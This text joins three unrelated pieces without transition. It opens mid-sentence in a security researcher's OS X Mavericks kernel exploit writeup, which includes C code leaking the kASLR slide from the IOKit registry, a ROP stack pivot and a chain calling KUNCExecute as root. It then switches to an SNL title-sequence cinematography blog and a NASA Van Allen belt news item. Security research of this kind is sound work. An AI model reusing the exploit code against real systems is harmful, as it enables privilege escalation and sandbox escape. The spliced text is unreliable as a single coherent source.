However, Mavericks doesn’t support SMAP, so this isn’t a problem: we can put the fake IOKit object, vtable and ROP stack in userspace.

kASLR

To write the ROP stack we need to know the exact location of the kernel code we’re planning to reuse. On OS X kernel address space layout randomisation means that there are 256 different addresses where the kernel code could be located, one of which is randomly chosen at boot time. Therefore to find the addresses of the executable code chunks we need some way to determine the distance kASLR has shifted the code in memory (this value is known as the kASLR slide.)

IOKit registry

We briefly mentioned earlier that the IOKit registry allows userspace programs to find out about hardware, but what does that actually mean? The IOKit registry is really just a place where drivers can publish (key:value) pairs (where the key is a string and the value something equivalent to a CoreFoundation data type.) The drivers can also specify that some of these keys are configurable which means userspace can use the IOKit registry API to set new values.

Here are the MIG RPCs for reading and setting IOKit registry values:

routine io_registry_entry_get_property(
        registry_entry : io_object_t;
    in  property_name  : io_name_t;
    out properties     : io_buf_ptr_t, physicalcopy );

routine io_registry_entry_set_properties(
        registry_entry : io_object_t;
    in  properties     : io_buf_ptr_t, physicalcopy;
    out result         : kern_return_t );

And here are the important parts of the kernel-side implementation of those functions, firstly, for setting a property:

kern_return_t is_io_registry_entry_set_properties(
    io_object_t registry_entry,
    io_buf_ptr_t properties,
    mach_msg_type_number_t propertiesCnt,
    kern_return_t * result)
{
...
    obj = OSUnserializeXML( (const char *) data, propertiesCnt );
...
#if CONFIG_MACF
    else if (0 != mac_iokit_check_set_properties(kauth_cred_get(),
                                                 registry_entry, obj))
        res = kIOReturnNotPermitted;
#endif
    else
        res = entry->setProperties( obj );
...

and secondly, for reading a property:

kern_return_t is_io_registry_entry_get_property(
    io_object_t registry_entry,
    io_name_t property_name,
    io_buf_ptr_t *properties,
    mach_msg_type_number_t *propertiesCnt )
{
...
    obj = entry->copyProperty(property_name);
    if( !obj)
        return( kIOReturnNotFound );

    OSSerialize * s = OSSerialize::withCapacity(4096);
...
    if( obj->serialize( s )) {
        len = s->getLength();
        *propertiesCnt = len;
        err = copyoutkdata( s->text(), len, properties );
...
...

These functions are pretty simple wrappers around the setProperties and copyProperty functions implemented by the drivers themselves.

There’s one very important thing to pick up on here though: in the is_io_registry_entry_set_properties function there’s a MAC hook (the mac_iokit_check_set_properties call) which allows sandbox profiles to restrict the ability to set IOKit registry values. (This hook is exposed by Sandbox.kext as the iokit-set-properties operation.) Contrast this with the is_io_registry_entry_get_property function, which has no MAC hook. This means that read access to the IOKit registry cannot be restricted: every OS X process has full access to read every single (key:value) pair exposed by every IOKit driver.

Enumerating the IOKit registry

OS X ships with the ioreg tool for exploring the IOKit registry on the command line. By passing the -l flag we can get ioreg to enumerate all the registry keys and dump their values. Since we’re looking for kernel pointers, let’s grep the output looking for a byte pattern we’d expect to see in a kernel pointer:

$ ioreg -l | grep 80ffffff

   |   "IOPlatformArgs" =<00901d2880ffffff00c01c2880ffffff90fb222880ffffff0000000000000000>

That looks an awful lot like a hexdump of some kernel pointers :)


Looking for the "IOPlatformArgs" string in the XNU source code we can see that the first of these pointers is actually the address of the DeviceTree that’s passed to the kernel at boot. And it just so happens that the same kASLR slide that gets applied to the kernel image also gets applied to that DeviceTree pointer, meaning that we can simply subtract a constant from this leaked pointer to determine the runtime load address of the kernel allowing us to rebase our ROP stack.
Check out this blog post from winocm for a lot more insight into this bug and its applicability to iOS.
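Programmatically, the leak and the slide computation look roughly like this. The registry path for the platform expert node and the unslid DeviceTree address are assumptions here; the real unslid value has to be taken from the kernel image you're targeting:

#include <IOKit/IOKitLib.h>
#include <CoreFoundation/CoreFoundation.h>
#include <stdio.h>

int main(void)
{
    /* The device tree root; IOPlatformArgs lives on the platform expert node. */
    io_registry_entry_t root = IORegistryEntryFromPath(kIOMasterPortDefault,
                                                       "IODeviceTree:/");
    CFDataRef args = (CFDataRef) IORegistryEntryCreateCFProperty(
                         root, CFSTR("IOPlatformArgs"), kCFAllocatorDefault, 0);
    if (!args)
        return 1;

    uint64_t devicetree_ptr = 0;
    CFDataGetBytes(args, CFRangeMake(0, 8), (UInt8 *) &devicetree_ptr);

    /* Placeholder: the unslid address of the DeviceTree for this kernel build. */
    const uint64_t UNSLID_DEVICETREE = 0xffffff8000000000ULL;
    printf("kASLR slide: 0x%llx\n", devicetree_ptr - UNSLID_DEVICETREE);
    return 0;
}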

OS X kernel ROP pivot

Looking at the disassembly of unmap_user_memory we can see that when the controlled virtual method is called the rax register points to the fake vtable which we've put in userspace. The pointer at offset 0x140 will be the function pointer that gets called, which makes the vtable a convenient place for the ROP stack. We just need to find a sequence of instructions which will move the value of rax into rsp. The /mach_kernel binary has the following instruction sequence:

push rax
add  [rax], eax
add  [rbx+0x41], bl
pop  rsp
pop  r14
pop  r15
pop  rbp
ret

This will push the vtable address on to the stack, corrupt the first entry in the vtable and write a byte to rbx+0x41. rbx will be the this pointer of the fake IOKit object, which we control and have pointed into userspace, so neither of these writes will crash. pop rsp then pops the top of the stack into rsp; since we just pushed rax on to the stack, this means that rsp now points to the fake vtable in userspace. The code then pops values for r14, r15 and rbp and returns, meaning that we can place a full ROP stack in the fake vtable of the fake IOKit object.
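Continuing the trigger() sketch from earlier, the fake vtable can be filled in so it doubles as the ROP stack. The slot arithmetic below just follows the gadget: after pop rsp, rsp points at fake_vtable[0], the three pops consume slots 0 to 2, and the ret lands on slot 3:

#include <stdint.h>
#include <stddef.h>

void build_pivot_stack(uint64_t *fake_vtable, uint64_t pivot_gadget,
                       const uint64_t *rop_chain, size_t n)
{
    fake_vtable[0] = 0;     /* clobbered by "add [rax], eax", then popped into r14 */
    fake_vtable[1] = 0;     /* popped into r15 */
    fake_vtable[2] = 0;     /* popped into rbp */
    for (size_t i = 0; i < n; i++)
        fake_vtable[3 + i] = rop_chain[i];     /* "ret" lands at slot 3 */

    /* The chain must stop short of slot 0x140/8 == 40, which still has to
       hold the pivot gadget that gets called via [rax+0x140]. */
    fake_vtable[0x140 / 8] = pivot_gadget;
}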

Payload and continuation

The OS X kernel function KUNCExecute is a really easy way to launch GUI applications from kernel code:

kern_return_t KUNCExecute(char executionPath[1024], int uid, int gid)

The payload for the pwn4fun exploit was a ROP stack which called this, passing a pointer to the string “/Applications/Calculator.app/Contents/MacOS/Calculator” as the executionPath and 0 and 0 as the uid and gid parameters. This launches the OS X calculator as root :-)
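A sketch of assembling that chain for build_pivot_stack() above: every address below is a placeholder which has to be located in /mach_kernel and then adjusted by the kASLR slide, and the gadget names are mine, not symbols from the writeup:

#include <stdint.h>
#include <stddef.h>

size_t build_chain(uint64_t *chain, uint64_t slide)
{
    static const char path[] =
        "/Applications/Calculator.app/Contents/MacOS/Calculator";
    size_t i = 0;
    chain[i++] = slide + 0x0 /* placeholder: pop rdi; ret */;
    chain[i++] = (uint64_t) path;   /* executionPath lives in userspace: no SMAP */
    chain[i++] = slide + 0x0 /* placeholder: pop rsi; ret */;
    chain[i++] = 0;                 /* uid = 0, root */
    chain[i++] = slide + 0x0 /* placeholder: pop rdx; ret */;
    chain[i++] = 0;                 /* gid = 0 */
    chain[i++] = slide + 0x0 /* placeholder: KUNCExecute */;
    chain[i++] = slide + 0x0 /* placeholder: thread_exception_return */;
    return i;
}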


Take a look at this exploit for this other IOKit bug which takes a slightly different approach by using a handful of ROP gadgets to first disable SMEP then call a more complicated shellcode payload in userspace. And if you're still running OS X Mavericks or below then why not try it out?

After executing the kernel payload we can call the kernel function thread_exception_return to return back to usermode. If we just do this, however, it will appear as if the whole system has frozen. The kernel payload has actually run (and we can verify this by attaching a kernel debugger) but we can no longer interact with the system. This is because, before we got kernel code execution, unmap_user_memory took two locks; if we don’t drop those locks then no other functions will be able to take them and the GPU driver grinds to a halt. Again, check out the linked exploit above to see some example shellcode which drops the locks.

Conclusion

The actual development process of this sandbox escape was nothing like as linear as this writeup made it seem. There were many missed turns and other bugs which looked like far too much effort to exploit. Naturally these were reported to Apple too, just in case.

A few months after the conclusion of pwn4fun 2014 I decided to take another look at GPU drivers on OS X, this time focusing on manual analysis. Take a look at the following bug reports for PoC code and details of all the individual bugs: CVE-2014-1372, CVE-2014-1373, CVE-2014-1376, CVE-2014-1377, CVE-2014-1379, CVE-2014-4394, CVE-2014-4395, CVE-2014-4398, CVE-2014-4401, CVE-2014-4396, CVE-2014-4397, CVE-2014-4400, CVE-2014-4399, CVE-2014-4416, CVE-2014-4376, CVE-2014-4402. Finally, why not subscribe to the Project Zero bug tracker and follow along with all our latest research?

How We Did It: SNL Title Sequence

2 hours 34 min ago

…And we’re back!  After a much-needed summer hiatus, it’s that time of the year again when my comrades in the SNL Film Unit all reconvene on the 17th floor of 30 Rockefeller Plaza for another season of filmmaking speed-drills.

While the usual shoot is a dead sprint from Thursday thru Saturday night, every few years we produce a new Title Sequence and that sprint becomes a 3-week non-stop marathon.  Especially when it’s the 40th Anniversary season.  The passing of Don Pardo — the legendary voice of SNL since 1975 — only amplified the feeling that this new sequence needed to be something extra special.

As always, the titles are a huge team effort.  Our director, Rhys Thomas, spent the summer collaborating with our logo design team at Pentagram Design, led by Emily Oberman, and with our portrait photographer, Mary Ellen Matthews, on a new logo and font design along with a set of mood-boards to experiment with the overall tone of the sequence.  The idea was to honor the 40-year history of the show with something classic and iconic, a little more dressed-up than previous seasons and with typography that was integrated into the cityscape.

Rhys and I started chatting about the title sequence early in the summer as well.  It’s a tough challenge to come up with yet another new and interesting way to shoot what is often the exact same night exterior locations.  What can we do this year that we haven’t done before?  Are there any cool new camera techniques that we can test?  What’s the overall approach / concept?  Is there a narrative thread or is it pure montage?

We bandied about a lot of different ideas: what about hyperlapse – have you seen the incredible videos by Rob Whitworth?  What about super slo-mo – have you seen what the new Phantom4K can do??  For me, the breakthrough finally came when Rhys mentioned a pretty obscure idea: “There’s this group in Germany doing really cool things with light-writing.”  Uh, did you say light-writing?!

Light-writing is just what you’re thinking: a light-source is traced in the air using a long-exposure.  It’s a technique that’s as old as photography.  In fact, it’s so old-school that when Rhys mentioned it, the first image that came to mind was by Picasso!

It’s pure in-camera trickery…EUREKA! — suddenly we had our approach.  Not just light-writing, but an overall simple, clean concept: as an homage to the 40-year history of SNL, we would approach the sequence using in-camera techniques that would be at home just as well in 1975 as 2014.  Nothing that relies on modern post production techniques or other digital trickery (sorry, hyperlapse’ers).  It would be low-fi, analog, optical, vintage, classic.

Rhys and I – along with film unit producer Justus McLarty — brainstormed a list of in-camera techniques to test: slo-motion, tilt-shift, black&white, long-exposure motion blur, double-exposures, light-writing, timelapse, strobe photography, aerial photography, infrared photography, optical aberrations, anamorphic distortions, prism-distortions, etc.  This was quickly shaping up to be a venture into experimental photography and I admit to being a little nervous about whether the execs at the show were going to think that we had stepped off the deep end. Bear in mind, our job is not to just create a cool montage of New York-y imagery set to music.  The most important task is to introduce the audience to our cast members – in this case, all fifteen of them – and serve as an energetic warm-up for the show.

Shooting fifteen different portraits is a tall order and, in years past, the approach has often been to corral the entire cast to one location — a cool bar, a rooftop party scene, a hip nightclub, etc – and shoot everyone out in one long shoot day.  Then, in 2009, we took a very different approach, shooting each cast member in a unique night exterior location.  This idea happened to coincide with the DSLR-revolution; I shot the entire sequence with a Canon 5DmII, which was the only way we could have captured all of those verite-style, low-light night exteriors at the time.  The 2009 sequence lasted three seasons, replaced in 2012 for Season 38 with a new sequence directed by Mary Ellen Matthews that took a studio portrait photography approach.  For this 40th Anniversary season, Rhys wanted to return to the energy of shooting each cast member out-and-about in the city, even going to the extent of asking each cast member for location ideas: “Is there a place in the city where you’d like to shoot your portrait?” – offering the cast members creative investment in the title sequence and resulting in a really fun collaboration.

The other element of a new title sequence that we have to deliver are the show’s “bumpers” – the interstitial shots that run between the commercial breaks.  So in addition to the fifteen unique cast member locations, we had to come up with a minimum of ten unique bumpers, plus all of the b-roll footage to intercut with the portraits for the montage – all of which must adhere to our new in-camera, lo-fi manifesto.  This was getting complicated…

Rhys, Justus and I, along with our coordinators Melanie Bogin and Tom Carley, and office PA / research whiz-kid Louis Leuci, spent about a week brainstorming locations and testing in-camera techniques, including one rather absurd light-writing experiment involving a whisk stuffed with steel wool, doused in lighter fluid and set ablaze (that idea is still in development).  We quickly figured out that while some techniques were super cool, if we shot the cast members that way, this would quickly look more like a post-modern video installation than an SNL title sequence, so we limited our portraiture to only the most flattering techniques and relegated the more experimental ideas to either b-roll or bumpers.

For the cast, that meant two basic techniques: anamorphic lenses subtly distorted through prisms and…lens-whacking.  So let’s just get this out of the way: lens-whacking is not the coolest term.  Something just doesn’t feel great about saying, “Alright – the lighting looks perfect — now let’s do some lens-whacking!”  So instead, let’s go with the lesser-used term for the same technique: freelensing.  

For those of you in the dark on this concept, FREELENSING (or, ugh, lens-whacking), is a technique where you hold an unattached lens up to the camera’s lens port and manually focus the shot by moving the lens closer or further from the camera.  The technique allows stray light to leak into the port and flare the image, along with creating focus-distortions similar to tilt-shift and macro lenses.  The effect is incredibly volatile; the image is constantly shifting, refracting the optics and internal mechanics of the iris within flare-patterns.  It’s quite gorgeous with the exact kind of analog vibe that we were going for.

A word of caution: this is not the most camera or lens-friendly technique.  Not only is your camera’s sensor completely exposed to dust and moisture but you could accidentally strike the sensor with the rear element of your lens, to say nothing of the risk of scratching or dropping your lens.  Some lenses are definitely much better for this than other lenses, and needless to say, I did not attempt to whack a Leica Summilux-C.  Well, okay – I tried it once but thought better of it…

Our camera package came from TCS, where owners Erik and Oliver Schietinger were a huge help in putting together a set of vintage lenses for me.  These were relatively small, Arri-bayonet mount lenses — some of which pre-dated the 1970s.  The size of the lenses was perfect for freelensing — the rear elements could easily fit loosely within the camera’s lens port with plenty of air-space for light-leaks but just large enough that I couldn’t accidentally strike the image sensor.  The set included: Zeiss Distagon 16mm and 24mm, Zeiss Planar 50mm, Cooke Panchro 25mm and 100mm, Kilfit Munchen 90mm Macro and a Zeiss Superspeed 50mm with the unique triangular iris pattern of the earliest generation Zeiss lenses.  I found the 50mm Planar the most successful, though I liked the 90mm for close ups.  Believe it or not, we shot almost all of the cast portraits using this technique: tiny old lenses from the pre-70s, unattached to the camera and hand-manipulated to find focus and allow light-leaks.  In fact, we often created more extreme light-leaks by flaring the sensor with practical lights and even flashlights.

We also carried a set of anamorphic lenses to shoot a clean safety on the cast members in case this freelensing thing ended up looking waaaay too kooky once edited together.  We still wanted the anamorphics to have an optically deconstructed vibe so we tested a set of Japanese-made Kowa Prominar lenses – also dating back to the 70s – which had tremendous flares and haze.  They looked amazing but became unavailable at the last second so we opted for a set of the brand new Spanish-made Scorpiolens 2x anamorphics by Servicevision, which are lightweight and gorgeous but a bit too clean for the look we wanted so I held a glass triangular prism in front of them to create refraction patterns and distortions.

Another big hurdle for this freelensing technique was that I wanted to be handheld.  Going handheld with a full size cinema camera while hand-holding a tiny lens and manually finding focus turned out to be pretty tricky.  I knew an Easyrig would help manage the weight of the camera but I’ve never been super happy with the mechanics of an Easyrig.  This device combines a Steadicam-like vest with an overhead arm and spring-loaded cord with a hook that grabs the camera from the top-handle and distributes the camera’s weight into your hips.  It’s a little goofy-looking but it’s an incredible back-saver – vital for anyone hoping for longevity in this biz.  Don’t ruin your back, my friends — your future-self will thank me!  Having said that, operating with an Easyrig can be limiting due to the pendulum effect created by the tension cord.  You can’t really tilt or roll the camera without fighting the cord, and the cord tension can sometimes amplify the bounce/bump of your footstep when walking with the camera.

I had been struggling with this love/hate relationship with the Easyrig for about a year when my fellow SNL DP-compatriot Jason Vandermeer introduced me to a then-prototype rig called the “Gravity-One” from FlowCine, designed to bridge the camera-Easyrig gap: it’s a mounting plate that cradles the camera within a tilt / roll two-axis handle (the EasyRig cord itself provides the pan axis).  I saw the rig in person at NAB this year and thought it looked very promising so I mentioned it to the guys at TCS – who immediately purchased one and let me road-test it on the title sequence.  In short: it’s amazing.  Completely fixes my previous issues with the Easyrig.  FlowCine also makes a spring-arm that mounts to the top of the Easyrig called the “Serene Arm”, which works to dampen those pesky footsteps that get translated into bumps whenever walking with the rig.  I tested both rigs: the Gravity-One and Serene Arm, independently and together.  Independently they’re each an improvement but together they’re the full package and I HIGHLY RECOMMEND seeking out this combo for your next handheld job.

Along with the variety of lenses, we also shot with a variety of cameras.  Our main camera for the cast portraits was the Red Epic Dragon.  While we’ve leaned toward the Arri Alexa over the past couple of seasons, we tried out the Dragon on a handful of spots and found it to be a huge improvement over the (Non-Dragon) Epic.  As advertised, the dynamic range is much closer to the Alexa’s performance while the Dragon offers us a much wider range of resolution and frame rate options.  For a handheld experimental title sequence with lots of different tricks, the Dragon was an easy choice.  We started shooting the cast portraits at 6K resolution at 5:1 compression, thinking it would be very helpful to have a lot of room to re-frame shots, but after the first two cast-shoots (out of fifteen) racked up over 2TB of footage, we quickly dropped down to a more manageable 5K / 7:1 resolution.  For the non-freelensing shots, we rigged the camera with a Redrock MicroRemote wireless follow focus and Teradek Bolt; for most of the shoot, the only monitor on set was a battery-powered 5.6″ TVLogic for Rhys to handhold.  In addition to the Dragon, much of  the bumper-footage was shot with a Canon 5DmIII.  We even shot a couple bumpers with the same 5DmII and 16-35mm lens that I used for the 2009 sequence.

Once we had figured out our camera-approach to the cast portraits, I needed to find a fast but effective way to light them.  The 2009 title sequence was lit entirely with a couple of small LED LitePanels; there was a raw-grittiness to the lighting that I wanted to improve upon while still maintaining the same verite-spirit.  I also had a very small crew for this shoot.  For the titles, I had my Key Grip Mort Korn, Gaffer Sean Sheridan and an AC – a floating roster of Alex Waterson, Alex Martin and Tom Greco.  For the b-roll and bumpers, it was sometimes just Rhys, Justus and me.  Our entire gear package fit into a single sprinter-van.  Bear in mind: this wasn’t merely a budgetary restriction; we were zipping around to 5 locations per night, often in uncontrolled (public) spaces so keeping the crew and gear package small was just smart logistics.  With that in mind, I knew I wanted one beauty light that we could run off house power for locations that we controlled and one battery-powered light for wild locations.  For the big beauty light, we carried a Chimera OctaPlus with a mole-base socket, along with 1K and 500w globes on a 1K dimmer.  For the battery light, our G&E vendor, Available Light New York, built a battery-powered LED-based JEM-ball on a boom pole which they call the “American Hustle” rig (those of you who’ve seen the “American Hustle” behind-the-scenes featurette know what I’m talking about).  My gaffer, Sean, also built an LED-based battery-powered china ball and we were wielding dueling battery-powered china balls for Bobby Moynihan’s bowling sequence.  We also carried my personal set of BBS Area48 remote phosphor LED lights — which are pretty amazing for their high CRI index and high output while battery-powered.

One of the early mantras of this sequence was to create a “Love-letter to New York”, and one of the first visual ideas was to go up in a helicopter and shoot some A-Grade aerials.  (In fact, we’ve been talking about shooting aerials for as long as I’ve been at SNL but in my now fifteen seasons, we’d never actually done it.)  We knew that aerials would immediately add a classic, high-end gloss to the sequence and celebrate the unique and beautiful New York skyline.  There are a lot of ways to shoot aerial footage these days; we could fly a DJI Phantom with a GoPro, mount a Dragon to a Freefly Cinestar drone, handhold a MoVI out an open chopper door…or we could just hire the best aerial pilot in New York – Al Cerullo – which is what we did.  Al’s credits include The Wolf of Wall Street, Spiderman, X-Men, Captain America…pretty much any big movie shot in New York that needs aerials.  Al provided the helicopter, camera operator (Brian Heller) who he’s been working with for years, and CineFlex rig.  We had the choice of either an Alexa-M or an Epic Dragon.  We chose the Alexa because with the Epic, the helicopter would have to land every time we needed to change media or batteries – which would severely eat into our shooting time.  With the M-model Alexa, the camera and lens port are separated by a cable, allowing the lens to be in the gimbal on the front of the chopper while the camera body is inside the chopper itself for changing media and batteries.  (Fun fact: the Alexa-M was named “M” for Marie Antoinette…I’m sure you can figure that one out on your own).  The Alexa was mounted with a Canon 30-300mm zoom and set at 800 ISO. One of the coolest moments was a fly-by of Yankee Stadium, where Rhys had somehow pre-arranged for the SNL logo to appear on the jumbo-tron.  We rented the chopper for 4-hours including transit time and ended up with nearly 3-hours of gorgeous footage – and: yes, it was one of the bigger line items on the budget but for the production value they add, great aerials are worth every penny.

With a bed of beautiful aerials as our b-roll base, we wanted to include a street-level version of the same type of smooth traveling footage, so we mounted our Epic Dragon to a MoVI M10.  I’ve recently really loved the combination of the Dragon with Leica Summicron lenses on the MoVI, but I still wanted to maintain an optically-degraded, old-school quality so we picked up a set of Canon K-35 primes (again, from the 70s) – light weight and fast at T1.5.  I asked Sam Nuttman from Freefly Systems (makers of the MoVI) for his best advice for driving shots: insert car? back of pickup? side-door of mini-van?  He actually recommended shooting out of a sunroof, so we rented a baller Suburban and spent an evening driving through the city while I held the MoVI through the sunroof.  Sam was right: the sunroof gave us 360˚ views of the city without the obstacle of the car itself to shoot around.  I’m still amazed at how well the MoVI works in that kind of application.  The car was bouncing around…I was bouncing around…the MoVI rig was bouncing around and getting blasted with wind…the footage was silky smooth.

Our most experimental footage was relegated to the interstitial bumpers – so if you watch the show, watch out for them during the commercials this season.  One of the tricks I was most excited to try was a custom bokeh technique.  This one looks like a magic trick.  As we all know intuitively, when a light source is thrown out of focus – be it a lamp, car headlight, traffic light, etc. – it turns into a soft ball of light.  The shape of the out-of-focus light is called the "bokeh" (a Japanese term), and is actually a reflection of the shape of the iris of the lens itself.  So here's the trick: you can change the shape of that round ball into whatever shape you choose by creating a custom bokeh filter.  If the shape of the filter is smaller than the diameter of the iris, the out-of-focus bokeh will magically take the shape of the filter in place of the iris.

Here’s how it works: we wanted the bokeh to be shaped like the SNL logo, such that when we racked focus, every light source in the shot would turn into the logo.  Street traffic would turn into a river of SNL logos, with the logo changing from red to green in the traffic lights…

In order for this effect to work, the logo has to be smaller than the diameter of the iris of the lens.  To figure out that diameter, you use a simple formula:

(F)ocal length / (T)-stop = (D)iameter

So a 50mm lens at T2.0 = 25mm diameter.

That means I needed to create a 4×5 filter mask with a logo that would fit inside a 25mm circle.  I brought the logo into Adobe Illustrator, re-sized it to fit within a 25mm diameter and placed it within the frame of a 4" x 5.6" rectangle — the size of the glass filter I was using.  We sent the Illustrator file to our sign printer, who can print black laser-cut vinyl stickers.  Then we simply adhered the vinyl sticker to a 4×5 clear filter.  Voila!  We had a custom SNL-logo bokeh filter.  For these shots, we picked up a set of Leica Summilux-C lenses.  I experimented with different lenses and different-sized filters, but the best results were with the 50mm.
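
If you want to sanity-check the math for your own lens set, it's trivial to script.  A minimal sketch in Python (the lens/T-stop pairs below are just examples, not our exact kit):

    # Entrance-pupil diameter = focal length / T-stop.
    # The custom bokeh shape must fit inside this circle for the trick to work.
    def max_shape_diameter_mm(focal_length_mm, t_stop):
        return focal_length_mm / t_stop

    for focal, t in [(35, 2.0), (50, 2.0), (85, 2.0)]:  # hypothetical lenses
        d = max_shape_diameter_mm(focal, t)
        print(f"{focal}mm at T{t}: shape must fit in a {d:.1f}mm circle")

Longer focal lengths and faster stops give you a larger entrance pupil, and therefore more room for the logo.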

For another bumper shot, we wanted to shoot a tilt-shift timelapse to "miniaturize" an iconic city scene.  Shooting timelapse with a tilt-shift lens is a well-worn trope, but for those who have never tried it: a tilt-shift lens allows you to "tilt" the focal plane, creating a narrow band of focus.  When you shoot a tilted, shallow-focus timelapse of, say, a cityscape, our brains are tricked into interpreting that bustling cityscape as a miniature, like an electric train set.  Shooting from a slightly high angle (to mimic how you would traditionally look down at a miniature) and with a fairly fast shutter speed (to decrease motion blur and create choppier movement) helps sell the optical illusion.  In the case of this bumper, we shot out of a 7th-floor window at the base of Park Avenue, which offered a perfect high-angle shot looking north up the canyon of traffic.  I used a Canon 45mm TS (Tilt/Shift) and shot the scene at F2.8, 1/25th sec, 800 ISO, with a 1-second interval between shots.
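
The speed-up math for a shoot like this is worth a quick sketch, too.  Assuming 24 fps playback (an assumption; delivery rates vary), the shooting time falls out directly:

    # With a 1-second interval and 24 fps playback, every second of
    # playback consumes 24 seconds of real time: a 24x speed-up.
    INTERVAL_S = 1.0       # seconds between exposures (from the shoot above)
    PLAYBACK_FPS = 24      # assumed playback rate

    def shooting_seconds(clip_seconds):
        frames_needed = clip_seconds * PLAYBACK_FPS
        return frames_needed * INTERVAL_S

    print(shooting_seconds(10) / 60)  # -> 4.0 minutes for a 10-second bumper

So each 10-second bumper represents about four minutes of Park Avenue traffic compressed into choppy miniature.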

Coming full circle back to Rhys' idea that spurred this whole lo-fi concept in the first place, we wanted to incorporate light-writing into one of the bumpers.  After researching local light-writing artists in New York and even investigating a light-writing troupe in Germany, it dawned on us that this would be a great way to try out a new toy called the Pixelstick.  Rhys and I had both seen the Kickstarter campaign for Pixelstick a few months ago and I'd seen some cool images from friends who were early adopters, but the concept didn't really sink in until we were on this light-writing trip.

The Pixelstick is one of those amazing ideas that is hard to explain, but once you see it, you immediately get it.  In short, it's a portable, lightweight bar containing 200 RGB LEDs.  You load the device with an image – a 200-pixel-tall, 24-bit BMP (bitmap) file – via SD card.  When you trigger the bar, it flashes your image in a succession of pulses, one vertical line at a time, each LED corresponding to a single pixel.  If you photograph this pulsing with a long exposure and move the bar across the frame as it pulses, you literally "paint" the image in midair.  I know – very hard to wrap your brain around until you see it in action, so here's a little BTS video of the Pixelstick on one of our bumper shots:

And here is how that shot turned out after a 10-second exposure:

Now imagine that’s 1 frame of a 10-second shot.  We shot that same frame over and over until we had about 40 frames.  Technically we needed 240 frames for a 10-second shot but with a few dozen frames, we could sequence a timelapse shot by randomly repeating frames without it being noticeable.  The result is a shot that combines the look of a graphic with a handmade, stop-motion quality — another really fun in-camera trick.
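
For anyone curious how that sequencing works in practice, here's a minimal sketch of the idea, randomly repeating a few dozen captured frames to fill out the 240 a 10-second shot needs (the frame counts come from the shoot above; the code itself is just an illustration):

    import random

    CAPTURED_FRAMES = 40   # long-exposure stills we actually shot
    FRAMES_NEEDED = 240    # 10 seconds at 24 fps

    # Build a playback order by sampling the captured frames at random;
    # the repeats read as stop-motion jitter rather than obvious loops.
    sequence = [random.randrange(CAPTURED_FRAMES) for _ in range(FRAMES_NEEDED)]
    print(sequence[:12])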

This was just the tip of the iceberg as far as what’s possible with the Pixelstick.  We were lucky enough to have the creators of the Pixelstick – Duncan Frazier and Stephen McGuigan — give us a primer on some more advanced tricks, and we’ve already shot a few other Pixelstick bumpers that will make their appearance in the coming episodes.

The last in-camera bumper idea that we tried was perhaps the most literal.  The bumpers are essentially a 10-second shot with an SNL graphic overlaid.  But…does the graphic really need to be overlaid in post?  Of course not!  We had the new logo 3D-printed into a physical object about 4 inches tall, and have had a lot of fun shooting an ongoing series of what we're calling "Makerbot" shots – placing the plastic logo around the city and even on set with us.  If you watched the Chris Pratt season premiere, you might have seen our Makerbot-bumper shot on the set of our Guardians of the Galaxy parody trailer.

On the post side, the massive task of wading through the 4+TB of footage was handled by editor Sarra Idris in just a single week. The title sequence and bumpers do, of course, incorporate graphics.  Pentagram's original graphics treatment was for a very cool cathode-ray / video-smear look that evoked a retro-80s feeling, but in response to the actual footage, Rhys – along with Emily Oberman at Pentagram and Flame artist Kyle Derleth – pushed the style back a decade, incorporating the prismatic, optically-distorted quality of our camera-original footage.  Kyle also added a subtle motion-track to the titles, which made them feel even more like in-camera lens aberrations rather than a post-production addition.

Finally, our colorist was the phenomenal Tom Poole from Company 3.  Tom started with a print-emulation LUT similar to the one he previously created for Drive, keeping the contrast and colors within the restricted range that could be printed back to film.  Doing so keeps the blacks from getting too crushed and the whites from pushing into the hyper-contrast video realm.  While the result is technically less range than video can achieve, this is a classic case of "less is more", resulting in a much richer, more cinematic look.  We had actually planned to incorporate some black & white into the sequence, and Tom created an absolutely gorgeous b&w version of the footage, but in the end the color version just had so much pop that Rhys opted against using any b&w.

For me, the titles are kind of like the Olympics or the World Cup — every four years they completely take over my life for about 3 weeks.  This go-round, it was particularly satisfying to have the opportunity to try so many different experimental in-camera tricks.  The fact that one of the longest-running series in TV history is so open to having its title branding re-invented with such non-traditional techniques is a credit both to the producers' faith in our director Rhys and to the show's own counter-culture roots, which go back to 1975, some 40 years ago.  On a personal note, the titles are a rare opportunity to spend more than just a single fleeting day on a project with my SNL team.  While we had a few days of full-scale production, the majority of our 3-week shoot was basically a few friends hovering around a camera in the middle of the night, trying to come up with something cool.

To see how the final title sequence turned out, click here.

And if you’re interested in learning more about my process, check out my cinematography workshop — available as an HD Download at www.visualstorytelling.com.

NASA's Van Allen Probes Spot an Impenetrable Barrier in Space

2 hours 34 min ago

Two donuts of seething radiation that surround Earth, called the Van Allen radiation belts, have been found to contain a nearly impenetrable barrier that prevents the fastest, most energetic electrons from reaching Earth.

[image-50]

The Van Allen belts are a collection of charged particles, gathered in place by Earth's magnetic field. They can wax and wane in response to incoming energy from the sun, sometimes swelling up enough to expose satellites in low-Earth orbit to damaging radiation. The discovery of the barrier within the belts was made using NASA's Van Allen Probes, launched in August 2012 to study the region. A paper on these results appeared in the Nov. 27, 2014, issue of Nature magazine.

“This barrier for the ultra-fast electrons is a remarkable feature of the belts," said Dan Baker, a space scientist at the University of Colorado in Boulder and first author of the paper. "We're able to study it for the first time, because we never had such accurate measurements of these high-energy electrons before."

Understanding what gives the radiation belts their shape and what can affect the way they swell or shrink helps scientists predict the onset of those changes. Such predictions can help scientists protect satellites in the area from the radiation.

The Van Allen belts were the first discovery of the space age, measured with the launch of a US satellite, Explorer 1, in 1958. In the decades since, scientists have learned that the size of the two belts can change – they can merge, or even separate into three belts occasionally. But generally the inner belt stretches from 400 to 6,000 miles above Earth's surface and the outer belt stretches from 8,400 to 36,000 miles above Earth's surface.

A slot of fairly empty space typically separates the belts. But, what keeps them separate? Why is there a region in between the belts with no electrons? 

Enter the newly discovered barrier. The Van Allen Probes data show that the inner edge of the outer belt is, in fact, highly pronounced. For the fastest, highest-energy electrons, this edge is a sharp boundary that, under normal circumstances, the electrons simply cannot penetrate.

"When you look at really energetic electrons, they can only come to within a certain distance from Earth," said Shri Kanekal, the deputy mission scientist for the Van Allen Probes at NASA's Goddard Space Flight Center in Greenbelt, Maryland and a co-author on the Nature paper. "This is completely new. We certainly didn't expect that."

The team looked at possible causes. They determined that human-generated transmissions were not the cause of the barrier. They also looked at physical causes. Could the very shape of the magnetic field surrounding Earth cause the boundary? Scientists studied but eliminated that possibility. What about the presence of other space particles? This appears to be a more likely cause.

[image-69]

